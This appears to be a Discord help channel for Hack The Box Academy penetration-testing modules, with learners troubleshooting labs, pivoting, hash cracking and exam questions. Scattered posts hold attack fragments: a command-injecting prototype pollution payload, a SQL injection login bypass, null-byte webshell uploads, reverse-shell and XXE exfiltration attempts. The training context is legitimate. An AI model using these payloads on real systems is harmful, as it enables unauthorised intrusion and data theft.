#modules

I want to join the group of thre hack

hello can i have moderator or administrator help i have an discord issu for identify me

yall have a probleme for spawning targets or its just me?

I can spawn but im getting this
smbclient -L 10.129.142.193 -U htb-student
do_connect: Connection to 10.129.142.193 failed (Error NT_STATUS_IO_TIMEOUT)

when i try to connect via smb client from Linux

its pretty infuriating TBH

yeah me to i can spawn it but connection error

I've wasted more time figuring out how to connect, if I am connected and why can't I connect than actually using the platform

hi I tried to get this section working for the ICMP Tunneling with SOCKS section of Pivoting Tunneling and Port Forwarding Module. I tried to resolve this error yesterday in chatgpt and what it said didn't work. I am able to log into pivot host but here's what I get when I try to run the tool it tells me to run on pivot host:

ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22
[sudo] password for ubuntu: 
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.36' not found (required by ./ptunnel-ng)
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ptunnel-ng)

Do I need to make it into an executable on attack box and then transfer?

or do I need an older version of ptunnel-ng?

It’s shellcode

Hay guy
Are there any professional cyber security here if yes I just want to get the advice on how they're joining was in learning cyber security
Cuz I'm kind of very confused
Just telling me how does parents was

Yes an older version will probably run.

ok

how do I know which version to download?

https://repology.org/project/ptunnel-ng/packages

I could shoot in the dark but they all look like a recent version

the kali rolling one isn't the one I'm looking for because its the one I already tried first

so should I get the ubuntu one?

this is for the ICMP Tunneling with SOCKS section of Pivoting, Tunneling, and Port Forwarding

do you have a recommended version or do I just do any old version?

if its too old won't it be outdated?

wait I think I am about to get it to work

Hi

ok it didn't work

really strange so I ran the ncat command again and was given the flag, but now I am wondering why it was not working originally! and also why it can only work on the pawnbox and not on my kali VM

don't reveal direct answers/solutions to modules

hi on pwnbox its working better but there are still issues with the tool I'm using on the pivot host. this is for ICMP Tunneling with SOCKS section of Pivoting, Tunneling,and Port Forwarding

in my VM it won't work but I get closer with Pwnbox

I have a screenshot of where I'm at now but I'm 100% confident if I post it will be spoiler

wait nope it doesn't work on pwnbox

sorry, I didnt know that was the answer because it was not working for me originally hence why i asked for help 🙂

Hello How do I can contact moderator or admin Discord?

Why?

Issue with identify on the Discord

You can create it using c and assemble or use something like msfvenom to generate it for you

Theres a lot online

Use the static build method shown in the section.

Hi Mr.Robyn good to see you here

ok

hi

how are you?

I’m doing good

I’m going to graduate

good I just completed the section

it worked I finished the section thanks

I lost my progress, I login today and my account progress was reset

Hi, please contact support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

You can DM me

Hi all QQ, just completed the Introduction to Web Applications, at the end of the module it stated: Finally, to apply what we learned from these modules, we can jump into attacking some Easy boxes on HackTheBox. how ever when I click the HackTheBox button, it just sends me to my account, so where do i find the machines related to Web Applications? Thanks in advance.

congratulations

I'm surprised that module says that tbh. Most of the boxes, even easy ones, are going to have things out of scope of the exam. That said, when you click "finish" on the module it takes you to a page with recommendations on the lower right if you scroll down, there's a list of boxes there.

Thank you

footprinting Ipmi i have the hash but i'm getting a token length exception: 1/1 hashes. i don't understand whats wrong, did i capture the token incorrectly?

hello friends

in Footprinting - Oracle TNS

https://academy.hackthebox.com/module/112/section/2117

when executing the bash script, it doesn't work. any suggestions?

you gotta read that one, you have to install it

yes, the script is for the install but it doesn't work

iirc you need to supply the --user command since the hash you receive is user:pass in the hash

the bash script frequently breaks, it's best to run each command one at a time

also "it doesn't work" isn't really descriptive of the issue, "it doesn't work" can mean a multitude of things without a meaningful error to help pinpoint your problem

ty ty....it says it's gonna take 3 days....uhhh i think i goofed?

expected != actual

but also

it sounds like you supplied the mask instead of just using the hash itself

if you read the section carefully it tells you that the mask is for specific situations. otherwise you should be using a wordlist

is that list found in msf console or the resources button in the module?

resource button

msfconsole has a default wordlist it tries when it captures the hash, but i don't recommend changing that when you run the command -- it's a small list for a reason

you sure? thats the same word list from SMTP module

you mean the smtp section

the wordlist is the same for the whole module

the "resources" button doesn't change per section

ah

it encompasses the whole module itself;

if that wordlist doesn't work => rockyou.txt

how would i have know to look for that? or what clues would lead to that txt?

i was able to find the user and login of a person in the oracle tns module in Footprinting, but i'm not able to get sqlplus to work saying it's not installed. what's the package for it?

you must have missed something because i had to go through that entire setup line by line

hm ok

Anyone knows if there are any vouchers for anual subscription?

it's the typical "fuck you i'm out of options" wordlist, though i'm sure rockyou may have been mentioned at some point either in this module or a previous one

no

unless you mean does the annual sub come with an exam voucher => yes

but there's no voucher for the annual sub itself

Noted, thanks

are htb academy certs lifetime certs?

how long before a HTB certification expires?

mark; i beg you to look at the exam page for any of the exams

ok

Is it normal for machines to be slow

did you change the region for a better ping?

it doesn't say how long the exam certifies for on page

check the "Certification Steps page"

it depends; but if you're having issues -- use TCP vpn, or change vpn regions

oh wait I stand corrected

no expiration date it says. great. I thought they were lifetime certs so I guess I was right

yes; no expiration == lifetime

ok great

I'm psyched

I'm still working on CPTS

I'm getting through it much more quickly now than I was two months ago

I think I may finish in 6 months

or something I don't know. I think I am getting better mentally is part of it.

i had to break system packages thanks team

yep for python --break-system-packages is typically your friend

if it's not found with apt install python3-<packagename>

yeah i'm using my own vm instead of pwnbox so that was my issue

thanks for the help again friends

in future though, be more descriptive than "it's not working"

think of it this way; if someone asked you for help and just said "it's not working" with no other info; that'd be frustrating, no?

nah i'm a glue eater man i can relate

😆

but if someone said "hey i'm getting an error when doing this, can someone help?"

(though the python error tells you exactly what to do iirc)

then it becomes a "oh this error just means you gotta pray to Cthulu and the Machine Spirits"

gotta pray to john microsoft

John Microsoft won't help you with Linux

Praise the omnissiah

linustechtips torvald mb

Yo wsp guys I need your help

Attaching them to Sysreptor so that your notes and reporting are in the same place is a much better idea.

yeah I learnt to use that feature and wondered why I would bother

Hi guys, has anyone been able to solve or to point me to right direction for RCE with Prototype Pollution (https://academy.hackthebox.com/module/205/section/2343) I am bypassing filter by not utilziing proto but rather constructor such as: {"constructor":{"prototype":{"deviceIP":"127.0.0.1; whoami"}}} but that doesn't seem to pollute the Global Object prototype for me in order to achieve RCE. Thank you for the help!

Are you still needing assistance?

I did it

Hello

A question regarding the Windows Privilege Escalation in the DnsAdmins section, after I became the member of "Domain Admins" group. I couldn't access the Administrator folder. But then I used psexec and with it. I can successfully access the folders. Why is that?
Note: I started the terminal as Admin, And I couldn't use psexec to login before adding my user into the domain admins group. So the steps I took to add user in domain admins did help, but not in that RDP session, why? the module didn't discuss anything about this so my curiosity hits in ( I do get the flag btw, just wants to know why the formal didn't work)

Group Membership is evaluated at the login, so in order to access (local) resources you need to login again to apply the changes.

Thanks a ton. Didn't know that.

Hey guys I am doing the bleeding edge Vulnerabilities section. While in petitpotam after retriving the certificate I am not able to request tgt from that certificate using gettgtpkinit.py error is "KDC has no support for PADATA type (pre-authentication data)"
Even after restarting the DC using admin account the error remains same. Also launching new instance gives same error

Did you ever manage to get this answer?

they were not replying to your message

Ah got it, Sorry

Have you find the solution ? The only thing I've got is an HEX response. But conversion to ASCII or UTF-8 is not accepted as the answer. Knowing tha is a SHA-1 hash. Thanks in advance !

Hey guys

Same question, does anyone have hints?

hello, im stuck at a question in penetration "what is the name of the theme used by wordpress on this target" i used the proper tool (wpscan) but the theme could not be detected

Hey can anyone help me out with Pass the Hash in password attacks for the last question

Pls dm 🙌

Anyone finished the file uploads skill assessment? I'm super close but think i need a nudge. ||I've gotten around the extension and content filters, leaked source code. I'm uploading files, found the upload directory, identified naming convention for the files but when i try to access the file.... 404 not found ||

nevermind. of course not even 5 minutes after i send this message i figure it out every time

Write here on which questions you got stuck and I'll help you.

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

Write down from which module/section the question is.

You can just read it via dir command as with prev question

Will try that soon, afk rn

Web Proxies
proxying tools
Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?

stuck on this

Hey can you help me choosing an ip address of any website? seems like metasploit wont let me put one in

put hackthebox.eu into RHOST and set proxy properly (127.0.0.1 : 8080)

Proxy is set on burpsuite to 127.0.0.1 and port, burpsuite has it already ond efault but it seems like it doesnt give trhe request

Is anyone free to help explain/show “Web Requests” using Burp/Zap to me please? Some certain things I just don’t understand

Can take a look as soon as i get the task im doing correct

because im planning to do that next as soon as i get help with this one

figured it out, because i didnt input the proxy properly

I'm struggling with getting a reverse shell when using JuicyPotato. The priv esc. works fine, but no matter what I see to do, I can't catch a shell. I tested the script making the call and it works fine when I run it without JuicyPotato. Anybody can help? This is for the Win Priv Esc. Skill Assessment Part I

Did you ever get it working? I'm running into the exact same issue

how do I submit a correction in a module

#1234357888114364508

thanks

just pointed out, if your using a newer version of ldapsearch the -h will display the help menu and not work correctly. just have to add a note incase someone is using newer client the command would be ldapsearch -H ldap://172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(objectClass=*)" | grep -m 1 -B 10 pwdHistoryLength

It would be best as to make it a walkthrough error rather than a targeterror. But that's fine

oh

I can update that

I updated it thanks

Is there a gap between the ! And ' in the pass?

nope

Try it without the password, does it attempt to connect?

Oh thank guys, i fingered out, in the session have already give me another way if xfreerdp is not usable

Thanks alot

Ah ok, I remember that one

you're serving on port 8000 but trying to connect to 8080

Is there any chance this Practicel DF will be fixed? trying to collect the memory via velociraptor unfortunately not working due to possible not able to get the winpmem to github

i have solved this after some minutes.

any support can assist me with this issue?

Hey if anyone can help im working on the Introduction to Networking module and i am pretty sure i got the right answer but it keeps telling me im wrong but im unsure if im formatting the answer wrong or misunderstanding what the questions is actually asking for

DM me with the info on which section/question you got stuck.

why does the terminal lag so awfully on target machine? VPN connection issue or what?

its VM lab itself not the VPN

Is it usually better? I cannot do anything at all in HTB Academy like that

Windows Attacks & Defense i cant connect target host

any errors or anything?

it is normal that the hosts of Attacking Enterprise Networks die while im doing pivoting with ligolo?

i mean, it is because the maintenance of CPTS cert?

false alarm, i think that the problem is with ligolo

the CPTS maintenance would have 0 bearing on module content

also the maintenance window isn't starting until the 18th

No one knows what will really be changed

@coral wraith Please don't spoil content, especially flags, form modules above tier 0

there is nothing to spoil since it's not working

You posted a flag

Hi Guys

I am trying to authenticate to sql and getting such a picture

mysql -u root -h 94.237.57.47 -P 56268 -p
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it

Yes but this flag does not work and also in the task stands that you need the cookies to go to the admin login to get the flag but this is not working. I only get these cookies

Could be a flag for something else then. Just post your question without posting content from modules above tier 0 especially flags and you're fine.

OK but do you now can help me solving it? Hint?

can't help right now sorry, just post your question and someone will likely get to you

Error says username or pass is incorrect, check your $SecPassword value, and please don't post content from modules above tier 0.

The password value that I set myself or discovered? I'm following the lab and I used a different password with mixed characters and get the same issue.

idk but i saw your $secpassword was set to '<PASSWORD HERE>' which doesn't seem like a password to me

I'm still researching and digging to see what I can find

sorry been a while since I last posted, where do we put module feedback?

#1234357888114364508 is probably the best place

ok thanks

I went down the steps again. I get both a user name or password error as well as an Unable to find user after running the "Set-DomainUserPassword" command to identify the damindsen password

AH! I Figured it out. Many thanks for the assist @cloud urchin

what do i do if im under 18

cuz i wanna learn how to be a hacker

It it just me or is there something wrong with the academy right now? Im in the process of doing the footprinting module, and the cube rewards for answering a question are set to 0(displayed).

Not every question from module sections offer cubes for completion. You will likely see them made up for later with harder sections or in the skills assessment at the end. Caught me by surprise during a module but they were there in the skills assessment.

Oh alright. Was just curious cause literally every answer is displayed with a "0" as the cube amount. Additionally, the skills assesment seem to reward a single cube for completion(?) At least thats how it is showing on my screen.

Not sure what displays on my end, but can check it out when I get home. If you decide to go through the sections you could tally it up and compare it against with what the module says you should earn. If there's a discrepancy on your end contact support.

Not al questions provide cubes when answered

Alright, I'll do so.

The problem is that, in my case, all the questions seem to reward 0 cubes

the module can be configured to grant cubes for certain questions

that's my theory

Try CTRL+SHIFT+R to hard refresh your cache, if you feel there's something wrong you can reach out to support on the site. I'm looking at the Footprinting Lab Hard skill assessment and it shows +1 for answering the question.

Ok I'll check it out again rn. Thanks

Now it all adds up. Everything's working fine and well.

Hello !
In the Attacking Common Services module, I am doing the FTP part. I started this morning, did the nmap, found the FTP port.
I had to go do something and am now back. I spawn a new target, which does not have the FTP port open (port that I identified this morning). I relaunched multiple times the target machine but still the nmap scan indicates that the port is closed.
How can I fix that ?

Hey guys, finding a few issues with the guides for some of the assessments

there are some dead links etc and parts where the answer box doesnt accept the answer that you put in despite the fact that the guide says it is infact the answer, this is present on the "attacking web applications with Ffuf module" assessment and the dead links are on the Login Brute Forcing module. The 2023_200-most-used-passwords file does not seem to be present from the given command you just get a 404

That wordlist is part of seclists, if you don't have it (likely comes with your attacker machine) you can git clone the seclists and get it

the 2020_200 word list is there but not the 2023 unfortunately

Hi can someone please help me with the File Uploads Skills Assessment? I'm terribly stuck. I've already looked at the source code for upload.php, know what file extensions work, and know how files are renamed and what directory they go to. Every time I upload a file and go to it though it won't give me RCE. Any help would be greatly appreciated, been at this all day.

Nvm figured it out.

Anyone else had issues with PKINIT on the AD Trusts module Skill Assessment ?

Looking for a solution other than cycling VPNs and instances ...

Hi. I'm having trouble with the Password Attacks module Pas the Hash section. In the last task, which asks for C:\julio\flag.txt, I can't get a shell back. My reverse shell command executes successfully, but the shell doesn't connect. Can someone please check whether it works or if I'm doing something wrong?

According to my notes, I eventually got it to work via Kali after 3 resets of the env.

Also at 3 resets and still no changes :/

Did you also switched VPNs ?

I did not switch VPNs. I just gave the env more time to spin up, meaning I would spin up the env and give it about 10 minutes just in case.

Ok good to know thanks

Nothing worked even after 30 mins on my part

From both Linux and Windows attack paths?

Yep no difference

Did you do everything from the inlanefreight.ad machine or child ?

Pwn box or your own VM?

VM

I had to regain access to at least mssp

The only other thing would be to try it from pwnbox.

You can DM to discuss this.

hi I cannot connect to the pivot server on HTB Academy's RDP and Socks Tunneling with SOCKS over RDP section on the Pivoting, Tunneling and Port Forwarding module from my VM. I can connect from my Ubuntu host, which I named Windows, but it disconnects very quickly unless I run xfreeRDP as root. But when I run it as root and try copying the two files it tells me to copy to RDP pivot server it won't copy the file over.

Can someone help me out?

I will try deleting tun1 or whatever from kali interfaces but will that work better than on Ubuntu?

Anyone available to help with what is likely a silly question on a beginning module?

I'm running through Pentest in a Nutshell, in the Windows System Enumeration section. I'm not able to get the information required out of winPEAS for the exact OS version - it's showing "+ FullyQualifiedErrorId : NativeCommandFailed" as an error, and I'm not sure how to get around that since I don't think the module is at privesc yet. I reckon I'm doing something just... blatantly wrong.

Hi, Can anyone help with the Windows Evasion SA 2? I have made reverse shell and copy file VBS scripts that work on dev machine but shows timeout in logs

anyway I only have one tun interface on kali so I know that's not the problem

kali won't connect even after upgrade/update

and one of the files won't move over

to RDP server either way

pwnbox isn't working

because too many people using the pwnbox

I had mixed results. Went for another last try just to refresh the knowledge before doing some “assessment” and it pretty much wouldn’t budge even after an hour.

I have, in other situations, used the DA’s hash to verify if the CA’s root cert was still valid, which it was. So I couldn’t figure why the issue persisted.

Yeah i actually went through it again last night and when it didn't work I just called it good. Not sure what's up with that one.

working on 'Web Attacks' -> 'Advanced File Disclosure' I'm attempting 'data exfiltration with CDATA'. I've got the file hosted on my computer, I've got the request modified with my external entity information. I know the target machine is reaching out to my computer to get the malicious file, however when the server recieves the malicious request, it doesn't return any data. Is this expected?

If setup correctly it should request the dtd file which returns your payload in the response

If its requesting it from your webserver maybe theres an issue within it or after the remote entity triggers in your payload

@cloud urchin @waxen totem ok. thank you for the sanity check. I'll go back and double check everything

If its for the question at the end of that section though Im pretty sure there was another option if you cant recreate that option just yet

correct, there are 2 methods to exploit it, I just wanted to verify that what I was expierencing was a 'me' thing, not a technical thing. I'm going to try the other method here in a bit.

Thanks again.

Hi guys, a random question, was going through windows fundamentals, it looks like much more than fundamentals, do we need to know every single thing from it to go for cpts pathway or just skim through those modules

Windows Fundamentals is not part of the CPTS path. You don't need to complete it at all. If you're note familliar with Windows fundamentals you may want to study it though.

Its a part of pre security fundamentals

Which is a perquisite for cpts

The only prerequisite for CPTS is completing the path before you can attempt the exam.

The thing is, despite CPTS being a "beginner" certification, a beginner in hacking doesn't mean a beginner in IT in general. You need strong foundational knowledge. If you don't have that the fundamental modules can help.

Htb say that prequisite knowledge for cpts pathwat is for us to know pre security fundamentals pathway

Oh

The only thing that gatekeeps you from attempting the exam are the modules in the CPTS path. Once you complete those modules, it unlocks your ability to take the exam.

Ok, well I don’t have that strong of foundation in IT so I had to take that fundamentals pathway

If a person who jumped into the CPTS path had zero computer knowledge they're going to struggle pretty hard compared to someone who already has strong foundational knowledge, that's where the pre-security fundamentals come in, to bridge that gap.

everyone in general recommends to do that before cpts and this is really not so easy pathway, only being a pre requisite pathway, i wonder how will be the cpts pathway

Yeah just because it's "fundamental" doesn't mean it's easy. HTB also presents it in such a way that challenges you, and even if you know a lot about fundamentals if you take the fundamental modules you're still very likely to learn things you did not know before.

Sounds like you would benefit from going through the fundamentals path

I was able to get through the privilege escalation section, but even after running powershell as admin or even changing the admin password and using runas, I still couldn't get systeminfo to run (Access Denied). I've gotta be too far down the rabbit hole, but not sure where I messed up.

Hi. For the Active Directory Enumeration & Attacks Privileged Access, where do I find the neo4j URL to log in the Neo4j database?

Does the module call to log into neo4j and use it directly?

doesn't it just have you use bloodhound?

neo4j runs a webserver on the localhost you can usually navigate there in a web browser i think the default port is 7474 irrc

It suggests it is easier to use the GUI. I bring up the login page, but it says there's no database at the auto-populated address

are you using neo4j for the first time?

Yes, I am.

ok, when you launch neo4j you log in with the default creds and it makes you change the password. you log in to your localhost:7474 in your web browser. with the creds you change you can log into bloodhound with those same creds. neo4j handles the database while bloodhound connects to that db with the user:pass then visualizes attack paths for you.

after you upload the data ofc.

Sorry I might sound stupid, but can y’all help me start with cybersecurity I know the basics of os, networking, what do I do now?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Curious what the differences are between ntlmrelayx.py --adcs and certipy relay. They seem to do the exact same thing.

while going through the setting up module I came across a couple of typo's in the newer sections, can i report these anywere or is here fine?

#1234357888114364508

@grizzled niche you can dm me

Hello guys. in the Linux Services & Internals Enumeration Section, I found the python3 version but the flag is incorrect. does anyone know?

the question is What is the latest Python version that is installed on the target?

but I couldn't submit it

thanks for the offer, did some more trying, thought I'd tried everything, guess I didn't
ended up getting it working!

I did it with mimikatz your command there looked correct

yup that ended up working, the next step was hiding in plain sight i was overthinking things!

working on introduction to web application, trying to find the expossed credentilas cant sem to find it, any guide

which module and section specifically?

sensitive data exposure

Have you tried: literally just following the techniques shown in the section?

yes l have

aight, so what have you tried so far?

l have gone through the source code and the js script

are you sure you've thoroughly checked the source code? maybe look at the comments?

there are few comments but nothing is in there

you sure? copy paste the comments here

<!-- Google Tag Manager --> <!-- End Google Tag Manager --> !-- Google Tag Manager (noscript) -->

you sure you on the right site?

are you sure other versions aren't installed?

also what's the module name?

nvm it's the linux privesc

yeah do more enumeration to discover the information

Hi everyone, have anyone just finished the module "Login Brute Forcing"? I am stuck in section Custom Wordlists

I have got multiple credentials but none of them worked

found the answer, l was in the wrong site. thanks

yo guys

im still on password attacks

i remember asking a question in password attacks like 2 weeks ago lol

im on cracking ssh passphrase section

ive transfered the id_rsa

(encrypted transfer )

verified md5 hash matches

ran that exact command ssh2john.py SSH.private > ssh.hash

but at the end

i don't see any 'cracking ssh passphrase' section

└─$ john ssh.hash 
No password hashes loaded (see FAQ)

sry i meant question

section name is protected files

you can dm me the command you're using

aiiiight

no feedback on the issue despite support contact and now the thread is locked in #1234357888114364508 , what is going on with HTB Academy ??

I did but I don’t see still

There's multiple versions of python installed

Hi

I wanna ask something

https://dontasktoask.com/

Hey! anyone has problem with the nmap section in Proxying Tools (Using Web Proxy module)?, i ran the nmap scan but the burp didnt intercept the request, i did curl and metasploit and all got intercepted except nmap

currently doing Premature Session Population in HTTP Misconfigs module. Anybody managed to do the exercise ?
I think it's broken

I did, a while back but

Anybody managed to do Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux in the Academy Active Directory module ? Because I retrieve Users with an SPN. However when asking for a TGS the GetUserSPN script run forever without giving me an error.

Alright, I’ve been going through the File Transfers module, upon getting to the Linux File transfer methods.

When I attempt to SSH into the targeted machine it spawns from the pwnbox I get the error “Connection Reset by <target IP> port 22”

Nmap shows port 22 is open using the provided htb-student and pw. Is there something I’m missing I know all the steps I need to perform to upload and run a hasher as I’ve done it with previous jobs just will not let me SSH into the machine.

Steps I’ve tried
Reset Pwnbox
Reset target machine
Both with a terminate and reset
Changed Pwnbox location from US west to Us East and CA

Logged out and back in
Tried a different network for the possibility it was on my end

Been. Reenforcing skills for the CPtS as I took a 4 year mental health break on cyber security from burn out

SQL Injections. Been trying to login as Tom for a while now, anyone know what I'm doing wrong? I've tried just inputting "tom", no username or '1'='1 and without, almost exhuasted my options

try a normal password and a payload in the username 😉

Thank you btw 🙂

mb didnt mean to leak that answer

Thanks so much, both ways work 😮

I urge you to figure out the logic chain or order of operations that the final query does so you can understand the reason why it works

I'm gonna go back into the readings and hope I understand more ofc 🙂 thanks so much

Here's a hint to the logic behind it: it also works with 1=2

That kinda confuses me more lol

If tom is true, and 1 = 4 is false, how tf am I logging in

Think of it this way, the AND evaluates before the OR so what you get is:
WHERE USERNAME='tom' OR ('1'='2' AND PASSWORD = 'p')
WHERE USERNAME='tom' OR FALSE
WHERE USERNAME 'tom'

Ohhh lol, that is very helpful for sure. So tom' is the user part, anything after belongs with the pass logic?

yep, but this will only work for that specific query, there's plenty of other query structures that that payload won't work for

I guess I still don't get how both pws can be false, but still sucessful log?
('1'=2 AND pass = 'notPass')

So '1'='2' isn't another password it's essentially the bypass to the password. Think of it this way,

The usual login:
login where username = Tom and Password = tom's password

The injection login:
login where the username = Tom OR don't login if Tom doesn't exist

Okay that makes sense, in a way it just sounds so crazy to think that works yk lol

I really appreciate it ❤️ that was so helpful lol. 65% cpts and it's been a burnout a bit lol, sometimes the content gets past my brain

Alright I’m about to Complete my CPTS path and in Windows Privilege Escalation subtopic SeTakeOwnershipPrivilege we were told to abuse the token to read content of flag.txt, although when we login first as HTB-student with its password and see whoami /priv I can’t see SeTakeOwnershipPrivilege token

hey i just started "network enumeration with nmap" and i dont find any option to start my target machine.

Spawn target

where is that button. sorry but i cant find any

If you can see it closely you can see some small boxes which means they are having targets within themselves

host discovery doesnt have that button i guess. could you please check

Yes those boxes means their subtopic will have questions to be answered and if you can see host and port scanning topic you’ll get the spawn target

Any mod who can reply me with this would be very helpful

the next module taught way better on logic + syntax. spent a good 40 mins really figuring it out but so worth it now, thanks for your help earlier!

Good afternoon guys someone had completed the module AI? I need a litle help

Which one? There 4 of those

Hey, Are the htb machines down?

the last friend

skilss assessment

I meant which module, not the section

There are a couple of those

AI applications of Ai in infosec 🙂

Use the example in the module

There’s also a repo of similar cases in the web

Example i don't understand bro

AI can also help you resolving the issues

i have these problem 🙂

but i don't know how fix it

It’s trying to open the file but there isn’t none.
Iirc the code should be executed in steps.
Also, make sure that any of the necessary files in the SA are in the directory

ok

i will try again

🙂

The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.

ZAP Fuzzer
Using web proxies

i got the cookie, I fuzzed with the top username list, but I got no flag found

Hi how do I need to add the IP-Adress to etc/hosts in the Attacking Web applications with ffuff Modul? With Port? IP:PORT?

LLMNR/NBT-NS Poisoning - from Linux, am i supposed to get on openVPN then ssh to the target? because ssh just times out even though i can ping it.

i have the same problem oh my got 😦

The file that your script should access is missing

i have upload of the left

look at this

Is the path correct? I haven't worked through the module, but Python says it can't find the file

I know

but this is supposed to be it

Yes, but is the file in the right place? Python cannot find the file

i think so

i have all flags less the last xD

It's not about finding flags, it's about understanding the content correctly 😉

Hey guys! A question regarding metasploit. Do I set the SRVHOST also as the VPN ip address like the LHOST? It was by default 0.0.0.0 on msfconsole

No idea what you're using so it's hard to say. Based off the name "SRVHOST", to me, it sounds like server host so probably 0.0.0.0 is fine.

i know still i'm noob sorry xD

Not knowing something is not a problem. That's why you're at the Academy, to learn things

yes 🙂

can anyone give a hint regarding noSQL assesment 2 in the CWEE course? I have the username and a possible vector yet cannot trigger a valid response

Dm me

A session is an active connection between the attacker and target system. A job is a background task that runs in metasploit.

A job is simply a task, something that metasploit runs

i don't know every single job metasploit is capable of, but it's possible for it to have those things as jobs

a session is just a temporary interactive information exchange between a user and a system. like when you RDP into a box, that's an RDP session you have open with the target you're remoting into.

when you're sitting in front of your computer and you log into it, that's a session you have with your computer

a reverse shell establishes a session

I'm currently in the intermediate network traffic analysis module. the question ask to enter the username user through the TELNET protocol. I followed the TCL stream to locate the username and found "uname -a" but the answer was incorrect. Am I missing a step?

I still can’t figure it out. Thanks anyway

Best to also say which section you're on

How can i transfer mutated wordlist from password attacks to pwnbox ?

Sorry TCP Connection Rests & Hijacking

Resets*

right-click
copy-link
wget <paste link>
also you don't transfer the mutated list, you generate the mutated list

Ah yes good point

10Q

the module gives you a username, password, and rules wordlists

Also is it possible to transfer from my host ?

uname -a is a linux command not a username

Explains it

doing the vuln assessment module. cant connect obviously. tried respawning 3x, no luck...

Is it supposed to be https?

now the 4th spawn is taking forever...

It usually is http, an easy test would be

curl http://<ip>:<port>

i will try when i get the ip....

Are you on the VPN? Are you using the pwnbox?

vpn

kali linux

the section does say to use https

ok, do you have the pwnbox spawned too?

no

My bad, haven't done the section

ok good. see if you can ping the target it seems more like you can't reach it because that's the correct port

gie me a sec to get the target ip

its taking very long atm

try ctrl+shift+r and then spawn it again

From 10.10.14.1 icmp_seq=6 Destination Host Unreachable

let me restart kali

same problem

destination host unreachable when pinging

the target ip

Hello!

Module: profile_images/readFlag.phar.jpg
Page: profile_images/readFlag.phar.jpg

In this exercise, I uploaded a file named shell.php\x00.gif containing a webshell payload. The server responds indicating the upload was successful. However, when I attempt to access URL/profile_images/shell.php, nothing loads.

My question is: does this mean the shell is never actually uploaded and the success message is intended to mislead, or am I simply looking in the wrong location?

I solved it another way, but I’m still scratching my head over why shell.php\x00.gif didn’t work.

Can someone throw me a lifeline before I start questioning reality?

Good afternoon! I'm doing the hard lab for the Password Attacks module. I've managed to get the administrator NTLM hash and ran hashcat against it. hashcat says it's cracked, but just gives me the NTLM hash (31*********0: <blank>)

has anyone run across that before?

I should say, i did double check that Administrator's password was not, in fact, blank. just in case.

nvm. i'm an idiot. that really is blank. so...somehow i didn't get all the hashes. le sigh

In that case, if anyone can tell me how i managed to get the hard part mounted, and the hashes are all blank i'd really appreciate that. that part took so long, i'm dreading having to redo it.

You can DM what you tried.

I follow the TCL stream and it's just a series of "...." I really not sure what I'm missing?

Agreed, I really like that feature. I just need to understand how to use Loot, though.

\x00 is a nullbyte; everything after is essentially ignored

Hello everyone, I'm having some trouble uploading my model (skills_assessment.joblib) for the AI Skills Assessment. Keeps telling me invalid model file. Any suggestions?

Thanks for the reply. I understand that is the reason I need to use the URL path of:

URL/profile_images/shell.php

but is not working. 😔

use a different payload to upload

nullbyte stuff is tricky and annoying, there's other methods that work just fine

Thanks!

https://tenor.com/view/approximate-adventuretime-knowledge-gif-4730015

google is also great, but it's important (in general) to know what a nullbyte is

You should check out Ippsec’s videos if you haven’t. A null byte is a relatively common thing to see in attacks

Also, participate in other CTFs! Even if you don’t complete a single challenge, it gives you experience and you can read writeups of the challenges you looked at afterward

\x is prefix for hex, \x00 is hex 00 => null byte when used in programming and most applications

hex is written in pairs \x00 => \xFF giving a wide range

Also when dealin with hex in general keep in mind the Endianness of the string. (don't worry it just refers to the order of the bytes)

for the IPMI footprinting....is it alright that i used john instead of hashcat? john i felt was easier and worked right away compared to hashcat where i had to feed it a different wordlist

Hi guys, I am on the Windows Fundamental modules on hackthebox academy, and I am not able to access windows powershell after using xfreerdp to log into the virtual windows machine. is there any way to get the powershell open

Looks like you just can't see the whole screen due to the resolution. Try using /dynamic-resolution with your xfreerdp command.

should be able to do windows key + r to open a run dialogbox and blindly type in powershell to open powershell though

i tried the windows key + r but all it does is open up the windows on my laptop xD

but i will try out the dynamic resolution method, thanks

update: it worked, thanks alot!

I'm working on Web Attacks -> Advanced File Disclosure. I'm attempting to use the technique discussed in the section "Advanced Exfiltration with CDATA" and I'm not able to trigger the bug. What can I provide to help diagnose this?

I think because when you upgrade metasploit in the future then all user-added exploits will be overridden by developer changes, so you will lose them if you add them directly to /usr/share/metasploit-framework/. You won't lose them if you keep them in .msf4

Good morning hackers

Hi guys, not sure if this has been posted again or is the correct channel, but I want to see if I am the only one. I am studying for the cdsa, but although the whole journey is amazing ( things that already know starting to make sense in a deeper form) I am starting to "loose heart" for study. I am not a native speaker, so I am loosing valuable time with translation, as many words that are being used are not so keen. I mean during the weekdays I hardly study two hours max cause all the time I have to translate staff.. and I can say that most of the day I speak and write in English at work.

#cdsa message

Guys, where to find pre-populated scan data for nessus skill assessment (Vuln assessment module)?

im so confused

am i tripping... or is it self conflicting....

Click on report button on the top right corner

Essentially link order = order in which the GPOs are processed.

then wouldnt that mean GPO with the lowest link order is processed first?

Yep, you highlighted it

but it says last

in the image

no such button, only reporting section

wut, what does your page look like

Yeah it's kinda confusing, just know that: The lower the number the higher the priority which means they overwrite the others

Ahh okie okie, thank you!!

1 is last but it's settings are applied first

Frst in Last out as it were

